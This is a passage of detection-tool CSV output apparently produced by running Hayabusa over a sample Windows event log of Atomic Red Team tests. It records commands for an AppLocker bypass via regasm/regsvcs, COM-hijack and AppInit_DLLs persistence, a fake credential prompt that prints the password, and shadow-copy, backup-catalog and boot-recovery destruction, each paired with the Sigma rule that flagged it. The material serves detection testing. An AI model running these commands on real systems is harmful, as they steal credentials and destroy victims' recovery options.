C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /r:System.EnterpriseServices.dll /target:library C:\AtomicRedTeam\atomics\T1121\src\T1121.cs | LID: 0x50951 | PID: 6344 | PGUID: 747F3D96-D7A3-5D31-0000-001035B02900",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:45:55.681 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe /U T1121.dll"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 5800 | PGUID: 747F3D96-D7A3-5D31-0000-001081B22900",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:45:55.681 +09:00,MSEDGEWIN10,1,low,Evas,Possible Applocker 
Bypass,,../hayabusa-rules/sigma/process_creation/proc_creation_win_possible_applocker_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:45:55.699 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe /U T1121.dll | Process: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe /U T1121.dll"" | LID: 0x50951 | PID: 6176 | PGUID: 747F3D96-D7A3-5D31-0000-0010D2B42900",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:45:55.699 +09:00,MSEDGEWIN10,1,low,Evas,Possible Applocker Bypass,,../hayabusa-rules/sigma/process_creation/proc_creation_win_possible_applocker_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:45:56.033 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""del T1121.dll"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 6804 | PGUID: 747F3D96-D7A4-5D31-0000-0010C9C22900",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:45:56.069 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 4080 | PGUID: 747F3D96-D7A4-5D31-0000-001020C62900",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 
23:46:19.052 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"" /r:System.EnterpriseServices.dll /target:library /keyfile:key.snk C:\AtomicRedTeam\atomics\T1121\src\T1121.cs | Process: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 2056 | PGUID: 747F3D96-D7BB-5D31-0000-0010E7FE2900",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:46:19.443 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 ""/OUT:C:\Users\IEUser\AppData\Local\Temp\RES1BEA.tmp"" ""c:\AtomicRedTeam\CSC8EBD65DB33242A1BAD76494F485AF42.TMP"" | Process: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"" /r:System.EnterpriseServices.dll /target:library /keyfile:key.snk C:\AtomicRedTeam\atomics\T1121\src\T1121.cs | LID: 0x50951 | PID: 4124 | PGUID: 747F3D96-D7BB-5D31-0000-00108F082A00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:46:19.484 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe"" T1121.dll | Process: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 1060 | PGUID: 747F3D96-D7BB-5D31-0000-0010D5092A00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:46:19.484 +09:00,MSEDGEWIN10,1,low,Evas,Possible Applocker 
Bypass,,../hayabusa-rules/sigma/process_creation/proc_creation_win_possible_applocker_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:46:20.767 +09:00,MSEDGEWIN10,13,medium,,Registry Key Value Set_Sysmon Alert,Persistence - COM Hijack | SetValue: HKCR\WOW6432Node\CLSID\{17C7DA62-8517-3DF1-A67C-BD4BCD2C5C3F}\InprocServer32\(Default): mscoree.dll | Process: C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe | PID: 1060 | PGUID: 747F3D96-D7BB-5D31-0000-0010D5092A00,../hayabusa-rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:46:20.775 +09:00,MSEDGEWIN10,13,medium,,Registry Key Value Set_Sysmon Alert,Persistence - COM Hijack | SetValue: HKCR\WOW6432Node\CLSID\{17C7DA62-8517-3DF1-A67C-BD4BCD2C5C3F}\InprocServer32\ThreadingModel: Both | Process: C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe | PID: 1060 | PGUID: 747F3D96-D7BB-5D31-0000-0010D5092A00,../hayabusa-rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:46:20.787 +09:00,MSEDGEWIN10,13,medium,,Registry Key Value Set_Sysmon Alert,Persistence - COM Hijack | SetValue: HKCR\WOW6432Node\CLSID\{17C7DA62-8517-3DF1-A67C-BD4BCD2C5C3F}\InprocServer32\Class: regsvcser.Bypass | Process: C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe | PID: 1060 | PGUID: 747F3D96-D7BB-5D31-0000-0010D5092A00,../hayabusa-rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:46:20.802 +09:00,MSEDGEWIN10,13,medium,,Registry Key Value Set_Sysmon Alert,"Persistence - COM Hijack | SetValue: 
HKCR\WOW6432Node\CLSID\{17C7DA62-8517-3DF1-A67C-BD4BCD2C5C3F}\InprocServer32\Assembly: T1121, Version=0.0.0.0, Culture=neutral, PublicKeyToken=cb1364609f40a1dc | Process: C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe | PID: 1060 | PGUID: 747F3D96-D7BB-5D31-0000-0010D5092A00",../hayabusa-rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:46:20.817 +09:00,MSEDGEWIN10,13,medium,,Registry Key Value Set_Sysmon Alert,Persistence - COM Hijack | SetValue: HKCR\WOW6432Node\CLSID\{17C7DA62-8517-3DF1-A67C-BD4BCD2C5C3F}\InprocServer32\RuntimeVersion: v4.0.30319 | Process: C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe | PID: 1060 | PGUID: 747F3D96-D7BB-5D31-0000-0010D5092A00,../hayabusa-rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:46:20.824 +09:00,MSEDGEWIN10,13,medium,,Registry Key Value Set_Sysmon Alert,Persistence - COM Hijack | SetValue: HKCR\WOW6432Node\CLSID\{17C7DA62-8517-3DF1-A67C-BD4BCD2C5C3F}\InprocServer32\CodeBase: file:///C:/AtomicRedTeam/T1121.DLL | Process: C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe | PID: 1060 | PGUID: 747F3D96-D7BB-5D31-0000-0010D5092A00,../hayabusa-rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:46:20.830 +09:00,MSEDGEWIN10,13,medium,,Registry Key Value Set_Sysmon Alert,Persistence - COM Hijack | SetValue: HKCR\WOW6432Node\CLSID\{17C7DA62-8517-3DF1-A67C-BD4BCD2C5C3F}\InprocServer32\0.0.0.0\Class: regsvcser.Bypass | Process: C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe | PID: 1060 | PGUID: 
747F3D96-D7BB-5D31-0000-0010D5092A00,../hayabusa-rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:46:20.841 +09:00,MSEDGEWIN10,13,medium,,Registry Key Value Set_Sysmon Alert,"Persistence - COM Hijack | SetValue: HKCR\WOW6432Node\CLSID\{17C7DA62-8517-3DF1-A67C-BD4BCD2C5C3F}\InprocServer32\0.0.0.0\Assembly: T1121, Version=0.0.0.0, Culture=neutral, PublicKeyToken=cb1364609f40a1dc | Process: C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe | PID: 1060 | PGUID: 747F3D96-D7BB-5D31-0000-0010D5092A00",../hayabusa-rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:46:20.849 +09:00,MSEDGEWIN10,13,medium,,Registry Key Value Set_Sysmon Alert,Persistence - COM Hijack | SetValue: HKCR\WOW6432Node\CLSID\{17C7DA62-8517-3DF1-A67C-BD4BCD2C5C3F}\InprocServer32\0.0.0.0\RuntimeVersion: v4.0.30319 | Process: C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe | PID: 1060 | PGUID: 747F3D96-D7BB-5D31-0000-0010D5092A00,../hayabusa-rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:46:20.858 +09:00,MSEDGEWIN10,13,medium,,Registry Key Value Set_Sysmon Alert,Persistence - COM Hijack | SetValue: HKCR\WOW6432Node\CLSID\{17C7DA62-8517-3DF1-A67C-BD4BCD2C5C3F}\InprocServer32\0.0.0.0\CodeBase: file:///C:/AtomicRedTeam/T1121.DLL | Process: C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe | PID: 1060 | PGUID: 747F3D96-D7BB-5D31-0000-0010D5092A00,../hayabusa-rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:46:51.883 
+09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""powershell.exe -command { = System.Management.Automation.Internal.Host.InternalHost.UI.PromptForCredential('Windows Security Update', '',[Environment]::UserName, [Environment]::UserDomainName); echo .GetNetworkCredential().Password;}"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 4256 | PGUID: 747F3D96-D7DB-5D31-0000-001089A52A00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:46:51.957 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: powershell.exe -command { = System.Management.Automation.Internal.Host.InternalHost.UI.PromptForCredential('Windows Security Update', '',[Environment]::UserName, [Environment]::UserDomainName); echo .GetNetworkCredential().Password;} | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""powershell.exe -command { = System.Management.Automation.Internal.Host.InternalHost.UI.PromptForCredential('Windows Security Update', '',[Environment]::UserName, [Environment]::UserDomainName); echo .GetNetworkCredential().Password;}"" | LID: 0x50951 | PID: 4452 | PGUID: 747F3D96-D7DB-5D31-0000-0010B5A82A00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:46:51.957 +09:00,MSEDGEWIN10,1,low,Exec,Non Interactive PowerShell,,../hayabusa-rules/sigma/process_creation/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:47:21.972 +09:00,MSEDGEWIN10,13,medium,,Registry Key Value Set_Sysmon Alert,Persistence or CredAccess - Lsa 
NotificationPackge | SetValue: HKLM\System\CurrentControlSet\Control\Lsa\Notification Packages: Binary Data | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 3912 | PGUID: 747F3D96-D6F7-5D31-0000-00104ACE2500,../hayabusa-rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:47:21.972 +09:00,MSEDGEWIN10,13,medium,Persis,CurrentControlSet Autorun Keys Modification,,../hayabusa-rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentcontrolset.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:47:37.096 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg.exe import c:\AtomicRedTeam\atomics\T1103\T1103.reg"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 3968 | PGUID: 747F3D96-D809-5D31-0000-00100A242B00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:47:37.127 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: reg.exe import c:\AtomicRedTeam\atomics\T1103\T1103.reg | Process: C:\Windows\System32\reg.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg.exe import c:\AtomicRedTeam\atomics\T1103\T1103.reg"" | LID: 0x50951 | PID: 6056 | PGUID: 747F3D96-D809-5D31-0000-00105C262B00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:47:37.147 +09:00,MSEDGEWIN10,13,medium,,Registry Key Value Set_Sysmon Alert,"Persistence - AppInit | SetValue: HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows\AppInit_DLLs: 
C:\Tools\MessageBox64.dll,C:\Tools\MessageBox32.dll | Process: C:\Windows\system32\reg.exe | PID: 6056 | PGUID: 747F3D96-D809-5D31-0000-00105C262B00",../hayabusa-rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:47:37.147 +09:00,MSEDGEWIN10,13,medium,Persis,New DLL Added to AppInit_DLLs Registry Key,,../hayabusa-rules/sigma/registry_event/sysmon_new_dll_added_to_appinit_dlls_registry_key.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:47:37.147 +09:00,MSEDGEWIN10,13,medium,Persis,CurrentVersion NT Autorun Keys Modification,,../hayabusa-rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion_nt.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:47:37.168 +09:00,MSEDGEWIN10,13,medium,,Registry Key Value Set_Sysmon Alert,Persistence - via Windows Load | SetValue: HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows\LoadAppInit_DLLs: DWORD (0x00000001) | Process: C:\Windows\system32\reg.exe | PID: 6056 | PGUID: 747F3D96-D809-5D31-0000-00105C262B00,../hayabusa-rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:47:37.168 +09:00,MSEDGEWIN10,13,medium,Persis,CurrentVersion NT Autorun Keys Modification,,../hayabusa-rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion_nt.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:47:37.215 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 980 | PGUID: 
747F3D96-D809-5D31-0000-001072292B00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:47:40.691 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""vssadmin.exe delete shadows /all /quiet"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 6896 | PGUID: 747F3D96-D80C-5D31-0000-0010223C2B00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:47:40.706 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: vssadmin.exe delete shadows /all /quiet | Process: C:\Windows\System32\vssadmin.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""vssadmin.exe delete shadows /all /quiet"" | LID: 0x50951 | PID: 1124 | PGUID: 747F3D96-D80C-5D31-0000-0010843F2B00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:47:40.706 +09:00,MSEDGEWIN10,1,critical,Evas | Impact,Shadow Copies Deletion Using Operating Systems Utilities,,../hayabusa-rules/sigma/process_creation/proc_creation_win_shadow_copies_deletion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:47:40.863 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 1348 | PGUID: 747F3D96-D80C-5D31-0000-001005542B00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:47:45.585 
+09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""wbadmin.exe delete catalog -quiet"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 4500 | PGUID: 747F3D96-D811-5D31-0000-001000632B00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:47:45.585 +09:00,MSEDGEWIN10,1,critical,LatMov | Disc | Evas | Impact,WannaCry Ransomware,,../hayabusa-rules/sigma/process_creation/proc_creation_win_malware_wannacry.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:47:45.624 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: wbadmin.exe delete catalog -quiet | Process: C:\Windows\System32\wbadmin.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""wbadmin.exe delete catalog -quiet"" | LID: 0x50951 | PID: 6160 | PGUID: 747F3D96-D811-5D31-0000-001061652B00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:47:45.624 +09:00,MSEDGEWIN10,1,critical,Evas | Impact,Shadow Copies Deletion Using Operating Systems Utilities,,../hayabusa-rules/sigma/process_creation/proc_creation_win_shadow_copies_deletion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:47:45.624 +09:00,MSEDGEWIN10,1,critical,LatMov | Disc | Evas | Impact,WannaCry Ransomware,,../hayabusa-rules/sigma/process_creation/proc_creation_win_malware_wannacry.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:47:45.773 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\wbengine.exe"" | Process: 
C:\Windows\System32\wbengine.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 6064 | PGUID: 747F3D96-D811-5D31-0000-0010726A2B00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:47:45.958 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\System32\vds.exe | Process: C:\Windows\System32\vds.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 3184 | PGUID: 747F3D96-D811-5D31-0000-0010147C2B00,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:47:46.112 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 2948 | PGUID: 747F3D96-D812-5D31-0000-0010AC892B00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:47:46.302 +09:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"Execution - Suspicious Schedule.Service Module Load | Image: C:\Windows\System32\taskschd.dll | Process: C:\Windows\System32\wbengine.exe | Company: Microsoft Corporation | Signed: true | Signature: Valid | PID: 6064 | PGUID: 747F3D96-D811-5D31-0000-0010726A2B00 | Hash: SHA1=BE65E71FC691867FFA1D3129CEAB67A0688A08CB,MD5=9A0C13D674AB2D72193653EF38D8FB8E,SHA256=15817A5CB717D4846AE753A27CD8859BCE63004143083027FA5EC9324DFC5188,IMPHASH=5694D579C32F1A7EB5FA54148C174C38",../hayabusa-rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:47:51.816 
+09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 6508 | PGUID: 747F3D96-D817-5D31-0000-001064AD2B00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:47:51.865 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures | Process: C:\Windows\System32\bcdedit.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures"" | LID: 0x50951 | PID: 396 | PGUID: 747F3D96-D817-5D31-0000-001097B02B00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:47:51.865 +09:00,MSEDGEWIN10,1,high,Impact,Modification of Boot Configuration,,../hayabusa-rules/sigma/process_creation/proc_creation_win_bootconf_mod.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:47:51.997 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""bcdedit.exe /set {default} recoveryenabled no"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 6216 | PGUID: 747F3D96-D817-5D31-0000-001049B42B00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:47:51.997 